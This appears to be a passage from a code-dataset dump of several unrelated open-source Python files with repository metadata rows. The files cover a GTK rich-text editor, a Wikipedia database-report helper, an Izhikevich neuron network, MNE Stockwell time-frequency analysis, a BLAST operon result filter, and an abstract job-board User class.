out = sys.stdout
self._html_buffer.set_output(out)
self._html_buffer.write(buffer_contents,
textbuffer.tag_table,)
##title=title)
out.flush()
except IOError, e:
raise RichTextError("Could not save '%s'." % filename, e)
textbuffer.set_modified(False)
def _load_images(self, textbuffer, path):
"""Load images present in textbuffer"""
for kind, it, param in iter_buffer_contents(textbuffer, None, None,
ignore_tag):
if kind == "anchor":
child, widgets = param
if isinstance(child, RichTextImage):
filename = child.get_filename()
if is_relative_file(filename):
filename = os.path.join(path, filename)
## For absolute windows filenames
if filename.startswith('file://'):
filename = filename[7:]
## Modified
if filename.startswith("http:") or \
filename.startswith("file:"):
child.set_from_url(filename, os.path.basename(filename))
else:
child.set_from_file(filename)
class HtmlEditor(KeepNoteEditor):
def __init__(self):
'''
Do not call the KeepNoteEditor constructor, because we need our own
classes here.
'''
##KeepNoteEditor.__init__(self, None)
gtk.VBox.__init__(self, False, 0)
# state
self._textview = HtmlView() # textview
#self._page = None # current NoteBookPage
#self._page_scrolls = {} # remember scroll in each page
#self._page_cursors = {}
self._textview_io = HtmlIO()
self._sw = gtk.ScrolledWindow()
self._sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self._sw.set_shadow_type(gtk.SHADOW_IN)
self._sw.add(self._textview)
self.pack_start(self._sw)
##self._textview.connect("font-change", self._on_font_callback)
##self._textview.connect("modified", self._on_modified_callback)
self._textview.connect("child-activated", self._on_child_activated)
##self._textview.connect("visit-url", self._on_visit_url)
self._textview.disable()
self.load_html('<html></html>')
self.show_all()
def load_html(self, html):
html = html.replace('\n', '')
self._textview_io.load(self._textview, self._textview.get_buffer(), \
html)
def _on_child_activated(self, textview, child):
if isinstance(child, RichTextImage):
filesystem.open_url(child.get_filename())
def get_html(self):
self._textview_io.save(self._textview.get_buffer())
return
output = StringIO.StringIO()
self.set_output(output)
textbuffer = textview.get_buffer()
buffer_contents = iter_buffer_contents(textbuffer, None, None, ignore_tag)
self.write(buffer_contents, textbuffer.tag_table, title=None)
self._out.flush()
return output.getvalue()
def set_editable(self, editable):
self._textview.set_editable(editable)
self._textview.set_cursor_visible(editable)
def set_font_size(self, size):
self._textview.modify_font(pango.FontDescription(str(size)))
def highlight(self, string):
self._textview.highlight(string)
| pakesson/rednotebook | rednotebook/gui/richtext.py | Python | gpl-2.0 | 11,878 | [
"VisIt"
] | a00b246063f861ddfbce0fee1f31e856e19a60ca2bc91fdbe446f1f1780e602f |
# Copyright (C) 2015 Hydriz Scholz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA, or visit
# <http://www.gnu.org/copyleft/gpl.html>
import datetime
import MySQLdb
import settings
import wikitools
class DBQuery:
def __init__( self, database='', host='s3.labsdb', read_default_file='~/.my.cnf' ):
self.read_default_file = read_default_file
self.host = host
self.database = database + '_p'
def execute( self, query ):
conn = MySQLdb.connect( host=self.host, db=self.database, read_default_file=self.read_default_file )
cursor = conn.cursor()
cursor.execute( query )
result = cursor.fetchall()
cursor.close()
conn.close()
return result
class Wiki:
def __init__( self, wikidb ):
self.database = wikidb
if ( self.database == "simplewiki" ):
self.apiUrl = "https://simple.wikipedia.org/w/api.php"
self.reportPrefix = "Wikipedia:Database reports"
elif ( self.database == "simplewiktionary" ):
self.apiUrl = "https://simple.wiktionary.org/w/api.php"
self.reportPrefix = "Wiktionary:Database reports"
self.username = settings.username
self.password = settings.password
self.summary = settings.summary
def outputToWiki( self, title, contents ):
self.wiki = wikitools.Wiki( self.apiUrl )
self.wiki.login( self.username, self.password )
title = "%s/%s" % ( self.reportPrefix, title )
report = wikitools.Page( self.wiki, title )
reporttext = contents
report.edit( reporttext, summary=self.summary, bot=1 )
def getDataAsOf( self ):
query = "SELECT UNIX_TIMESTAMP() - UNIX_TIMESTAMP(rc_timestamp) FROM recentchanges ORDER BY rc_timestamp DESC LIMIT 1;"
self.DBQuery = DBQuery( self.database )
replag = self.DBQuery.execute( query )
for seconds in replag:
result = ( datetime.datetime.utcnow() - datetime.timedelta( seconds=int( float( seconds[0] ) ) ) ).strftime( '%H:%M, %d %B %Y (UTC)' )
return result
if __name__ == "__main__":
print "This module should not be called directly! Please use dbr.py to run the database reports." | Hydriz/DBReports | DBRCore.py | Python | gpl-3.0 | 2,653 | [
"VisIt"
] | b39a77a900669030a90fac1a6e1fddc41f10fbc2439fa5188bfae4a45468a5b8 |
"""
Computational Neurodynamics
Exercise 2
(C) Murray Shanahan et al, 2015
"""
from IzNetwork import IzNetwork
import numpy as np
import numpy.random as rn
def Connect2L(N0, N1):
"""
Constructs two layers of Izhikevich neurons and connects them together.
Layers are arrays of N neurons. Parameters for regular spiking neurons
extracted from:
http://www.izhikevich.org/publications/spikes.htm
"""
F = 50 / np.sqrt(N1) # Scaling factor
D = 5 # Conduction delay
Dmax = 10 # Maximum conduction delay
net = IzNetwork([N0, N1], Dmax)
# Neuron parameters
# Each layer comprises a heterogenous set of neurons, with a small spread
# of parameter values, so that they exhibit some dynamical variation
# (To get a homogenous population of canonical "regular spiking" neurons,
# multiply r by zero.)
# Layer 0 (regular spiking)
r = rn.rand(N0)
net.layer[0].N = N0
net.layer[0].a = 0.02 * np.ones(N0)
net.layer[0].b = 0.20 * np.ones(N0)
net.layer[0].c = -65 + 15 * (r**2)
net.layer[0].d = 8 - 6 * (r**2)
# Layer 1 (regular spiking)
r = rn.rand(N1)
net.layer[1].N = N1
net.layer[1].a = 0.02 * np.ones(N1)
net.layer[1].b = 0.20 * np.ones(N1)
net.layer[1].c = -65 + 15 * (r**2)
net.layer[1].d = 8 - 6 * (r**2)
# Connectivity matrix (synaptic weights)
# layer[i].S[j] is the connectivity matrix from layer j to layer i
# S(i,j) is the strength of the connection from neuron j to neuron i
net.layer[1].S[0] = np.ones([N1, N0])
net.layer[1].factor[0] = F
net.layer[1].delay[0] = D * np.ones([N1, N0], dtype=int)
return net
| lawrencejones/neuro | Exercise_2/Connect2L.py | Python | gpl-3.0 | 1,685 | [
"NEURON"
] | 94b68d4c15a01914af62bb49f7a031dcf39a9c8b2425bc404d6ec304cbeff425 |
# Authors : Denis A. Engemann <denis.engemann@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
#
# License : BSD 3-clause
from copy import deepcopy
import math
import numpy as np
from scipy import fftpack
# XXX explore cuda optimazation at some point.
from ..io.pick import pick_types, pick_info
from ..utils import logger, verbose
from ..parallel import parallel_func, check_n_jobs
from .tfr import AverageTFR, _get_data
def _check_input_st(x_in, n_fft):
"""Aux function"""
# flatten to 2 D and memorize original shape
n_times = x_in.shape[-1]
def _is_power_of_two(n):
return not (n > 0 and ((n & (n - 1))))
if n_fft is None or (not _is_power_of_two(n_fft) and n_times > n_fft):
# Compute next power of 2
n_fft = 2 ** int(math.ceil(math.log(n_times, 2)))
elif n_fft < n_times:
raise ValueError("n_fft cannot be smaller than signal size. "
"Got %s < %s." % (n_fft, n_times))
zero_pad = None
if n_times < n_fft:
msg = ('The input signal is shorter ({0}) than "n_fft" ({1}). '
'Applying zero padding.').format(x_in.shape[-1], n_fft)
logger.warning(msg)
zero_pad = n_fft - n_times
pad_array = np.zeros(x_in.shape[:-1] + (zero_pad,), x_in.dtype)
x_in = np.concatenate((x_in, pad_array), axis=-1)
return x_in, n_fft, zero_pad
def _precompute_st_windows(n_samp, start_f, stop_f, sfreq, width):
"""Precompute stockwell gausian windows (in the freq domain)"""
tw = fftpack.fftfreq(n_samp, 1. / sfreq) / n_samp
tw = np.r_[tw[:1], tw[1:][::-1]]
k = width # 1 for classical stowckwell transform
f_range = np.arange(start_f, stop_f, 1)
windows = np.empty((len(f_range), len(tw)), dtype=np.complex)
for i_f, f in enumerate(f_range):
if f == 0.:
window = np.ones(len(tw))
else:
window = ((f / (np.sqrt(2. * np.pi) * k)) *
np.exp(-0.5 * (1. / k ** 2.) * (f ** 2.) * tw ** 2.))
window /= window.sum() # normalisation
windows[i_f] = fftpack.fft(window)
return windows
def _st(x, start_f, windows):
"""Implementation based on Ali Moukadem Matlab code (only used in tests)"""
n_samp = x.shape[-1]
ST = np.empty(x.shape[:-1] + (len(windows), n_samp), dtype=np.complex)
# do the work
Fx = fftpack.fft(x)
XF = np.concatenate([Fx, Fx], axis=-1)
for i_f, window in enumerate(windows):
f = start_f + i_f
ST[..., i_f, :] = fftpack.ifft(XF[..., f:f + n_samp] * window)
return ST
def _st_power_itc(x, start_f, compute_itc, zero_pad, decim, W):
"""Aux function"""
n_samp = x.shape[-1]
n_out = (n_samp - zero_pad)
n_out = n_out // decim + bool(n_out % decim)
psd = np.empty((len(W), n_out))
itc = np.empty_like(psd) if compute_itc else None
X = fftpack.fft(x)
XX = np.concatenate([X, X], axis=-1)
for i_f, window in enumerate(W):
f = start_f + i_f
ST = fftpack.ifft(XX[:, f:f + n_samp] * window)
TFR = ST[:, :-zero_pad:decim]
TFR_abs = np.abs(TFR)
if compute_itc:
TFR /= TFR_abs
itc[i_f] = np.abs(np.mean(TFR, axis=0))
TFR_abs *= TFR_abs
psd[i_f] = np.mean(TFR_abs, axis=0)
return psd, itc
def _induced_power_stockwell(data, sfreq, fmin, fmax, n_fft=None, width=1.0,
decim=1, return_itc=False, n_jobs=1):
"""Computes power and intertrial coherence using Stockwell (S) transform
Parameters
----------
data : ndarray
The signal to transform. Any dimensionality supported as long
as the last dimension is time.
sfreq : float
The sampling frequency.
fmin : None, float
The minimum frequency to include. If None defaults to the minimum fft
frequency greater than zero.
fmax : None, float
The maximum frequency to include. If None defaults to the maximum fft.
n_fft : int | None
The length of the windows used for FFT. If None, it defaults to the
next power of 2 larger than the signal length.
width : float
The width of the Gaussian window. If < 1, increased temporal
resolution, if > 1, increased frequency resolution. Defaults to 1.
(classical S-Transform).
decim : int
The decimation factor on the time axis. To reduce memory usage.
return_itc : bool
Return intertrial coherence (ITC) as well as averaged power.
n_jobs : int
Number of parallel jobs to use.
Returns
-------
st_power : ndarray
The multitaper power of the Stockwell transformed data.
The last two dimensions are frequency and time.
itc : ndarray
The intertrial coherence. Only returned if return_itc is True.
freqs : ndarray
The frequencies.
References
----------
Stockwell, R. G. "Why use the S-transform." AMS Pseudo-differential
operators: Partial differential equations and time-frequency
analysis 52 (2007): 279-309.
Moukadem, A., Bouguila, Z., Abdeslam, D. O, and Dieterlen, A. Stockwell
transform optimization applied on the detection of split in heart
sounds (2014). Signal Processing Conference (EUSIPCO), 2013 Proceedings
of the 22nd European, pages 2015--2019.
Wheat, K., Cornelissen, P. L., Frost, S.J, and Peter C. Hansen (2010).
During Visual Word Recognition, Phonology Is Accessed
within 100 ms and May Be Mediated by a Speech Production
Code: Evidence from Magnetoencephalography. The Journal of
Neuroscience, 30 (15), 5229-5233.
K. A. Jones and B. Porjesz and D. Chorlian and M. Rangaswamy and C.
Kamarajan and A. Padmanabhapillai and A. Stimus and H. Begleiter
(2006). S-transform time-frequency analysis of P300 reveals deficits in
individuals diagnosed with alcoholism.
Clinical Neurophysiology 117 2128--2143
"""
n_epochs, n_channels = data.shape[:2]
n_out = data.shape[2] // decim + bool(data.shape[2] % decim)
data, n_fft_, zero_pad = _check_input_st(data, n_fft)
freqs = fftpack.fftfreq(n_fft_, 1. / sfreq)
if fmin is None:
fmin = freqs[freqs > 0][0]
if fmax is None:
fmax = freqs.max()
start_f = np.abs(freqs - fmin).argmin()
stop_f = np.abs(freqs - fmax).argmin()
freqs = freqs[start_f:stop_f]
W = _precompute_st_windows(data.shape[-1], start_f, stop_f, sfreq, width)
n_freq = stop_f - start_f
psd = np.empty((n_channels, n_freq, n_out))
itc = np.empty((n_channels, n_freq, n_out)) if return_itc else None
parallel, my_st, _ = parallel_func(_st_power_itc, n_jobs)
tfrs = parallel(my_st(data[:, c, :], start_f, return_itc, zero_pad,
decim, W)
for c in range(n_channels))
for c, (this_psd, this_itc) in enumerate(iter(tfrs)):
psd[c] = this_psd
if this_itc is not None:
itc[c] = this_itc
return psd, itc, freqs
@verbose
def tfr_stockwell(inst, fmin=None, fmax=None, n_fft=None,
width=1.0, decim=1, return_itc=False, n_jobs=1,
verbose=None):
"""Time-Frequency Representation (TFR) using Stockwell Transform
Parameters
----------
inst : Epochs | Evoked
The epochs or evoked object.
fmin : None, float
The minimum frequency to include. If None defaults to the minimum fft
frequency greater than zero.
fmax : None, float
The maximum frequency to include. If None defaults to the maximum fft.
n_fft : int | None
The length of the windows used for FFT. If None, it defaults to the
next power of 2 larger than the signal length.
width : float
The width of the Gaussian window. If < 1, increased temporal
resolution, if > 1, increased frequency resolution. Defaults to 1.
(classical S-Transform).
decim : int
The decimation factor on the time axis. To reduce memory usage.
return_itc : bool
Return intertrial coherence (ITC) as well as averaged power.
n_jobs : int
The number of jobs to run in parallel (over channels).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : AverageTFR
The averaged power.
itc : AverageTFR
The intertrial coherence. Only returned if return_itc is True.
See Also
--------
cwt : Compute time-frequency decomposition with user-provided wavelets
cwt_morlet, psd_multitaper
Notes
-----
.. versionadded:: 0.9.0
"""
# verbose dec is used b/c subfunctions are verbose
data = _get_data(inst, return_itc)
picks = pick_types(inst.info, meg=True, eeg=True)
info = pick_info(inst.info, picks)
data = data[:, picks, :]
n_jobs = check_n_jobs(n_jobs)
power, itc, freqs = _induced_power_stockwell(data,
sfreq=info['sfreq'],
fmin=fmin, fmax=fmax,
n_fft=n_fft,
width=width,
decim=decim,
return_itc=return_itc,
n_jobs=n_jobs)
times = inst.times[::decim].copy()
nave = len(data)
out = AverageTFR(info, power, times, freqs, nave, method='stockwell-power')
if return_itc:
out = (out, AverageTFR(deepcopy(info), itc, times.copy(),
freqs.copy(), nave, method='stockwell-itc'))
return out
| cmoutard/mne-python | mne/time_frequency/_stockwell.py | Python | bsd-3-clause | 9,819 | [
"Gaussian"
] | ca5d491f24775df3dae0a7b414762accfa6d348cad83e7d749e9b3f5b70b9056 |
#!/usr/bin/python
from multiprocessing import Pool
import time
import os
import sys
import argparse
import math
from homolog4 import *
from collections import defaultdict
import itertools
# Copyright(C) 2014 David Ream
# Released under GPL version 3 licence. http://www.gnu.org/licenses/lgpl.html
# Do not remove this comment
# This exists to make the main function easier to read. It contains code to run the argument parser, and does nothing else.
def parser_code():
parser = argparse.ArgumentParser(description="This program will be used to remove spurious results from a BLAST search organized by operon.")
parser.add_argument("-i", "--infolder", dest="infolder", default='./blast_parse/', metavar="DIRECTORY",
help="A folder that contains the operon BLAST results.")
parser.add_argument("-o", "--outfolder", dest="outfolder", metavar="DIRECTORY", default='./optimized_operon/',
help="Folder where the filtered results will be stored. Default is the folder './optimized_operon/'.")
parser.add_argument("-f", "--filter", dest="filter", default='', metavar="FILE",
help="A file that contains the operons that are under investigation. All others will be omitted from analysis an results.")
parser.add_argument("-n", "--num_proc", dest="num_proc", metavar="INT", default = os.sysconf("SC_NPROCESSORS_CONF"), type=int,
help="Number of processors that you want this script to run on. The default is every CPU that the system has.")
parser.add_argument("-e", "--eval", dest="eval", default='1e-10', metavar="FLOAT", type=float,
help="Use this option to change the eval for the BLAST search that is permitted. Useful if you would like to investigate what altering the eval threshold will do to your results.")
parser.add_argument("-g", "--max_gap", dest="max_gap", metavar="INT", default = 500, type=int,
help="Largest allowable gap to be considered a gene block by the analysis.")
return parser.parse_args()
def check_options(parsed_args):
if os.path.isdir(parsed_args.infolder):
infolder = parsed_args.infolder
else:
print "The folder %s does not exist." % parsed_args.infolder
sys.exit()
# if the directory that the user specifies does not exist, then the program makes it for them.
if not os.path.isdir(parsed_args.outfolder):
os.makedirs(parsed_args.outfolder)
outfolder = parsed_args.outfolder
if outfolder[-1] != '/':
outfolder = outfolder + '/'
if os.path.exists(parsed_args.filter):
filter_file = parsed_args.filter
elif parsed_args.filter == '':
filter_file = parsed_args.filter
else:
print "The file %s does not exist." % parsed_args.filter
sys.exit()
# section of code that deals determining the number of CPU cores that will be used by the program
if parsed_args.num_proc > os.sysconf("SC_NPROCESSORS_CONF"):
num_proc = os.sysconf("SC_NPROCESSORS_CONF")
elif parsed_args.num_proc < 1:
num_proc = 1
else:
num_proc = int(parsed_args.num_proc)
# validate the input for the eval
try:
e_val = float(parsed_args.eval)
except:
print "The e-value you entered is not a floating point number, please enter a floating point number, ex. '1e-3', or '12'."
sys.exit()
# validate the input for the maximum allowed gap
try:
max_gap = int(parsed_args.max_gap)
if max_gap <= 0:
print "The gap that you entered %s is a negative number, please enter a positive integer." % parsed_args.max_gap
sys.exit()
else:
pass
except:
print "The gap that you entered %s is not an integer, please enter a positive integer." % parsed_args.max_gap
sys.exit()
return infolder, outfolder, filter_file, num_proc, e_val, max_gap
#this function will return all of the files that are in a directory. os.walk is recursive traversal.
def return_recursive_dir_files(root_dir):
result = []
for path, dir_name, flist in os.walk(root_dir):
for f in flist:
fname = os.path.join(path, f)
if os.path.isfile(fname):
result.append(fname)
return result
def return_file_list(infolder, filter_file):
if filter_file == '':
return return_recursive_dir_files(infolder)
else:
filter_list = [i.strip() for i in open(filter_file)]
return [i for i in return_recursive_dir_files(infolder) if os.path.basename(i).split('.')[0] in filter_list]
# This function will take a BLAST tabular result, and remove any hits that are worse than the eval threshold provided
# The return will be a list of those hits as homolog objects.
def filter_eval(fname, e_val):
# make a list of homolog class objects
h_list = [Homolog.from_blast(i) for i in open(fname).readlines()]
result = list(filter((lambda x: x.e_val() <= e_val), h_list))
return result
def resolve_multiple_ORF_hits(hlist):
result = [hlist[0]]
curr_homolog = hlist[0]
for next_homolog in hlist[1:]:
# we have multiple BLAST hits that share a ORF, resolve using e_val
if curr_homolog.start() == next_homolog.start():
# If current homolog has better eval
if curr_homolog.e_val() <= next_homolog.e_val():
# print curr_homolog.organism(), curr_homolog.locus(), "is duplicated"
pass
# The current homolog has a worse eval, remove for the better example
else:
result.pop(-1)
result.append(next_homolog)
#print "This totally worked", next_homolog.organism()
else:
result.append(next_homolog)
# Now that we are done testing the current and next homolog against
curr_homolog = next_homolog
return result
# The purpose of this function is to take a list of homologs, that have been e_val (or potenitally another means) filtered.
# The return is all homologs from organisms that contain at least one neighborhood defined by max_gap.
def return_valid_organism_homologs(hlog_list, max_gap):
org_dict = {}
# Stage 1: read the list of homologs in, and organize based on accession. Each accession will have a list of homologs for a given operon.
# Prior to this, the program does not sort the output.
# This section has been tested and validated to the best of my abilities.
#print len(hlog_list)
for item in hlog_list:
accession = item.accession()
#print accession
if accession in org_dict.keys():
org_dict[accession].append(item)
else:
org_dict.update({accession:[item]})
# Stage 2: Sort the list of homologs for each organism. Determine gene blocks based on the max_gap criterion,
# and reject organisms without a gene block.
# This section has been tested, but not extensively. I have added resolve_multiple_ORF_hits which is untested.
for accession in sorted(org_dict.keys()):
h_list = org_dict.pop(accession)
h_list.sort(key=lambda x: x.start())
# Here is where the code dealing explicitly with multiple hits to a single ORF goes:
# currently, we only use best hit. Other resolution schemes can be envisioned.
ORF_filetered_hlist = resolve_multiple_ORF_hits(h_list)
org_dict.update({accession:ORF_filetered_hlist})
# Stage 3: Organize the homologs into neighborhoods. We remove any organisms that lack neighboring genes.
# The return from this stage is a list of lists. Where each sub-list is a gene block, as defined by max_gap.
# This version is not completely tested, but appears to be working when tested against known cases.
neighborhood_dict = {}
for accession in sorted(org_dict.keys()):
hlist = org_dict.pop(accession)
gene_block_list, neighborhood_found = group_homologs(hlist, max_gap)
if neighborhood_found:
neighborhood_dict.update({accession:gene_block_list})
org_dict.update({accession:hlist})
# Enable the print organism bit to see what we filter out initially...
else: # do nothing, there are no neighborhoods that have been recovered
#print "accession", accession, "is missing."
#print "Organism ", hlist[0].organism(), "is missing."
#print hlist
pass
# An explanation on what each of these returned dictionaries contains:
# Each has organisms that only contain gene neighborhoods.
# neighborhood_dict: accession keyed dict whose data is a list of neighborhods. organism1:[[h1, h2], [h3, h4], [h5]]
# org_dict: accession keyed dict whose data is a list of ungrouped homologs. organism1:[h1, h2, h3, h4, h5]
# org_dict differs from the inpupt (besides being a dict and not a list) by
return neighborhood_dict, org_dict
# I think this version is more readable than those i have made in the past.
# It can take either a sorted, or unsorted list of homologs.
def group_homologs(lst_homologs, max_gap):
# bypassing pass by reference in python that leads to potentially undesirable behavior downstream
list_homologs = [i for i in lst_homologs]
# Step 1: Sort the input list by the start position of the ORF
list_homologs.sort(key=lambda x: x.start())
# Step 2: Group homologs into gene blocks as defined my max_gap, and report these groups.
result, neighborhood_found = homolog_list_grouping_function(list_homologs, max_gap)
return result, neighborhood_found
# This function will take a list of ordered homologs, which have had their redundant BLAST thits removed, and group them by a max_gap constraint.
# The return is a list of lists. Single genes and gene blocks will both be represented as groups.
def homolog_list_grouping_function(list_homologs, max_gap):
result = []
neighborhood = [list_homologs[0]]
neighborhood_found = False
for i in list_homologs[1:]:
#look at current
start = neighborhood[-1].start() #start = list_homologs[i].start()
stop = neighborhood[-1].stop() #stop = list_homologs[i].stop()
# look at next
start_n = i.start() #start_n = list_homologs[i+1].start()
stop_n = i.stop() #stop_n = list_homologs[i+1].stop()
# We have found neighboring genes, as defined by max_gap
if math.fabs(start - stop_n) < max_gap or math.fabs(stop - start_n) < max_gap:
neighborhood_found = True
neighborhood.append(i)
# These genes do not neighbor eachother
else:
result.append(neighborhood)
neighborhood = [i]
result.append(neighborhood)
#print list_homologs[0].organism(), "result", result, "neighborhood_found ", neighborhood_found
return result, neighborhood_found
# fast implementation of an order preserving make unique function
def make_unique(lst, function):#lambda a: a.start):
seen = {}
result = []
for item in lst:
marker = function(item)
if marker not in seen:
seen.update({marker:1})
result.append(item)
return result
# This function will take the grouped lists, and determine which gene block genes do not occur as part of a neighborhood.
# These singletons genes will further be filtered for the best e-val as reported by BLAST. (Though other filtering schemes could be developed later)
def return_best_singleton_genes(grouped_lists):
# the result will be a list of lists.
result = []
# Step 1: determine all recovered genes (for a given gene block) in this organism
# return a list of evey homolog found by BLAST as a single list
organism_genes = list(itertools.chain(*grouped_lists))
# make list above unique based on the blast_annotation
unique_in_organism_by_annotation = make_unique(organism_genes, lambda x: x.blast_annotation())
# resulting in a list of annotations that are unique to the organism
organism_annotation_list = [i.blast_annotation() for i in unique_in_organism_by_annotation]
#print "organism_annotation_list", organism_annotation_list
# Step 2: determine genes that are found in neighborhoods as defined by the max_gap criterion
# find genes that are grouped
neighborhoods_only = [i for i in grouped_lists if len(i) > 1]
# make into a single list of homologs
neighborhood_hlog_list = list(itertools.chain(*neighborhoods_only))
# make list above unique based on the blast_annotation
unique_neighborhood_by_annotation = make_unique(neighborhood_hlog_list, lambda x: x.blast_annotation())
# resulting in a list of annotations that are unique to neighboring genes
neighborhood_annotation_list = [i.blast_annotation() for i in unique_neighborhood_by_annotation]
#print "neighborhood_annotation_list", neighborhood_annotation_list
# Step 3: return a list of singletons genes, that are only found as singletons in the current genome
single_annotation_list = list(set(organism_annotation_list) - set(neighborhood_annotation_list))
singleton_genes = [i for i in grouped_lists if len(i) == 1]
filtered_singlgeton_genes = [i for i in singleton_genes if i[0].blast_annotation() in single_annotation_list]
# Step 4: Find the singleton gene that has the most significant e-value per BLAST annotation
best_singleton_dict = {}
for tmp in filtered_singlgeton_genes:
gene = tmp[0]
# a singleton gene with this annotation has already been found, use e-val to determine wich is the more significant hit
if gene.blast_annotation() in best_singleton_dict.keys():
old_gene = best_singleton_dict.pop(gene.blast_annotation())
if old_gene.e_val() <= gene.e_val(): # the existing homolog is a more significant hit
best_singleton_dict.update({gene.blast_annotation(): old_gene})
else: # the new homolog is a more significant hit
best_singleton_dict.update({gene.blast_annotation(): gene})
else: # we have not seen this annotation yet, store it in the dictionary
best_singleton_dict.update({gene.blast_annotation(): gene})
# Step 5: return a list of lists, [[s1], [s2], [s3]] for each entry in the best_singleton_dict.
for i in best_singleton_dict.keys():
result.append([best_singleton_dict[i]])
return result
# This version is not rigorously tested, but seems to work correctly.
# Return a list of lists of homologs = [[],[]], number of splits, and number of duplications.
# unique_genes_in_organism, len_operon are integers grouped_list is a list of lists, and only contains groups 2 or more.
def optimize_neighborhoods(grouped_lists):
# Step 1: make the grouped lists into a single list of homologs
org_hlog_list = list(itertools.chain(*grouped_lists))
neighborhoods_only = [i for i in grouped_lists if len(i) > 1]
grouped_hlog_list = list(itertools.chain(*neighborhoods_only))
# Step 2: determine the number of unique genes in both neighborhoods, and the organism.
# To better explain: I need to know the number of unique genes the organism contains for the gene block.
# I also need to know the number of unique genes found in neighborhoods.
number_unique_genes_in_organism = len(make_unique(org_hlog_list, lambda x: x.blast_annotation()))
number_unique_in_neighborhoods = len(make_unique(grouped_hlog_list, lambda x: x.blast_annotation()))
'''
# Debugging. This does check out. kinda interesting stuff though here, there are some inline tandem repeats where gene name is different.
# Everything looks like it works correctly though
print org_hlog_list[0].organism(), "number_unique_genes_in_organism", number_unique_genes_in_organism, "number_unique_in_neighborhoods", number_unique_in_neighborhoods
if number_unique_in_neighborhoods == 1:
print "neighborhoods_only", neighborhoods_only
for group in neighborhoods_only:
for gene in group:
print gene.blast_annotation(), gene.genbank_annotation(), gene.locus(), gene.start(), gene.stop()
#print "grouped_lists",grouped_lists
'''
# Step 3: greedy algorithm to determine the best neighborhoods to report as a final result
optimal = False
num_in_list = 1 # this is the number of elements per list reurned
best_duplicates = 0
splits = number_unique_genes_in_organism - number_unique_in_neighborhoods
while not optimal:
for group in itertools.combinations(grouped_lists, num_in_list):
#all_homologs_in_grouping = [item for sublist in group for item in sublist]
all_homologs_in_grouping = list(itertools.chain(*group))
#print all_homologs_in_grouping
#unique_in_set = len(MakeUnique(all_homologs_in_grouping, lambda a: a.predicted_gene))
unique_in_set = len(make_unique(all_homologs_in_grouping, lambda x: x.blast_annotation()))
#if unique_in_set == len_unique_grouped: # we have an optimal solution, perhaps not global optima
if unique_in_set == number_unique_in_neighborhoods: # we have an optimal solution, perhaps not global optima
duplicates = int(math.fabs(len(all_homologs_in_grouping) - number_unique_in_neighborhoods))
if not optimal:
optimal = True
best_grouping = list(group)
best_duplicates = duplicates
best_split = splits
elif duplicates < best_duplicates:
best_grouping = list(group)
best_duplicates = duplicates
splits+=1
num_in_list+=1
#print "splits " , splits, ": best_split ", best_split
#print "Best grouping as found by the program\n", best_grouping
# Step 4: determine the best (if necessary) singleton genes to complete
if number_unique_genes_in_organism != number_unique_in_neighborhoods:
# This step takes time, so only perform it when you have to
best_singletons = return_best_singleton_genes(grouped_lists)
#print "Difference", number_unique_genes_in_organism - number_unique_in_neighborhoods, len(best_singletons)
#print "singletons", best_singletons , ' '.join([i.blast_annotation() for i in list(itertools.chain(*best_singletons))])
best_grouping = best_grouping + best_singletons
return best_grouping, best_split, best_duplicates#, len_unique_grouped
def parallel_filter_operons(arg_tuple):
fname, outfolder, max_gap, e_val = arg_tuple
def main():
start = time.time()
parsed_args = parser_code()
infolder, outfolder, filter_file, num_proc, e_val, max_gap = check_options(parsed_args)
print infolder, outfolder, filter_file, num_proc, e_val, max_gap
file_list = return_file_list(infolder, filter_file)
parallel_list_param = [(i, outfolder, max_gap, e_val) for i in file_list]
for fname in file_list:
print fname
hlog_list = filter_eval(fname, e_val)
# here we return two dictionaries that are keyed by org, and contain at least one gene block. Orgs without gene blocks are omitted.
neighborhood_dict, org_dict = return_valid_organism_homologs(hlog_list, max_gap)
# open a file handle to the output
head, tail = os.path.split(fname)
outfile = outfolder + tail
handle = open(outfile, 'w')
# Save the result, in the result folder, just like the good little program you are.
for org in sorted(neighborhood_dict.keys()):
best_grouping, best_split, best_duplicates = optimize_neighborhoods(neighborhood_dict[org])
grouping_list = sorted(list(itertools.chain(*best_grouping)), key=lambda x: x.start())
handle.write('\n'.join([i.to_file() for i in grouping_list])+'\n')
handle.close()
print time.time() - start
# ./filter_operon_blast_results.py -f phylo_order.txt
if __name__ == '__main__':
main()
| reamdc1/gene_block_evolution | filter_operon_blast_results.py | Python | gpl-3.0 | 20,438 | [
"BLAST"
] | d7afd2ecbb1c2554aa3e60e2eb5556620d51303f30682d181da5e987b34cede7 |
import abc
class User(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def delete(self):
"""
:return: True if this user has successfully been deleted
"""
return
@abc.abstractmethod
def is_job_visible(self, job, db_member):
"""
:param job:
:param db_member:
:return: True if the job created by the member is visible
"""
return
@abc.abstractmethod
def see_job_details(self, job_number, job_creator_mail):
"""
:param job_number: id of the job to return
:param job_creator_mail: the email of the 'owner' of the job
:return: the instance of Job object represented by the 'job_number' if the user can see it
otherwise, it returns None
"""
return
@abc.abstractmethod
def get_visible_job_list(self, show_demands):
"""
:param show_demands: the type of the list of the jobs to return
:return: the list of Job objects visible by the user
(offers if 'show_offers' is true and otherwise the demands)
"""
return
@abc.abstractmethod
def get_involved_job_list(self, show_offers):
"""
:param show_offers: the type of the list of the jobs to return
:return: the list of Job objects in which the user is involved
(offers if 'show_offers' is true and otherwise the demands)
"""
return
@abc.abstractmethod
def accept_job(self, job_number, job_creator_mail):
"""
Puts the member on the list of possible helpers for a pending job.
The helped one will be warned by email (this email is the parameter 'job_creator_mail').
:param job_number: the if of the job to accept
:param job_creator_mail: the email of the 'owner' of the job
:return: False if there was a problem and True otherwise
"""
return
@abc.abstractmethod
def stop_participate_job(self, job_number, job_creator_mail):
"""
Remove the member on the list of possible helpers for a pending job.
:param job_number: the if of the job to accept
:param job_creator_mail: the email of the 'owner' of the job
:return: False if there was a problem and True otherwise
